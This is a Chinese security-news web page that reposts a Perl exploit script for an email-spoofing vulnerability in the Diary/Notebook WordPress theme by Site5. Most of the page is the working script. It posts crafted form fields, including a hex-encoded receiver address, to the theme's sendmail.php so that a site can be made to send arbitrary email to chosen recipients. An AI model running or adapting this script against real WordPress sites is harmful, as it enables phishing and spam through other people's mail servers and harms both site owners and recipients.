当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

wordpress Diary/Notebook主题邮件欺骗漏洞

时间:2013/4/19 12:09:00 作者:平凡之路 来源:xuhantao.com 浏览:

WordPress的这款Diary/Notebook主题是有site5设计的一款个人日记blog系统主题.近期爆出了邮件欺骗的漏洞.附上perl脚本的Exp:
 
 
 
#!/usr/bin/perl
 
# Exploit Title: Diary/Notebook Site5 WordPress Theme - Email Spoofing
 
# Date: 15.07.2012
 
# Exploit Author: @bwallHatesTwits
 
# Discovered by: @xxDigiPxx ()
 
# Software Link:
 
# Vendor Homepage:
 
# Others Possibly Vulnerable:
 
# Version: Not Documented
 
# Tested on: Linux 3.2 
 
use strict;
 
use warnings;
 
use LWP::UserAgent; 
 
use HTTP::Request::Common qw{ POST };
 
#Change this to the root of the WordPress
 
my $wordpress = '';
 
my $url = $wordpress.'wp-content/themes/diary/sendmail.php';
 
#Name shows up in the topic of the email (Website contact message from name)
 
my $name ='Proof of Concept';
 
#Sender email address
 
my $email = 'sender@mail.com';
 
 #Content of the email
 
my $comment = 'Email content';
 
 #Receiver email address
 
my $receiver = 'receiver@mail.com';
 
$receiver =~ s/(.)/sprintf("%x",ord($1))/eg;
 
 my $ua = LWP::UserAgent->new();
 
my $request = POST( $url, [ name => $name, email => $email, comment => $comment, receiver => $receiver, submit => 'submit', ] );
 
print "Sending request to $url\n";
 
my $content = $ua->request($request)->as_string();
 
print $content;
 
print "\nDone\nFollow \@BallastSec on Twitter\n";
 
 
作者 牛X阿德玛 ,涛涛电脑知识网,涛涛电脑知识网

相关文章
  • 没有相关文章
共有评论 0相关评论
发表我的评论
  • 大名:
  • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1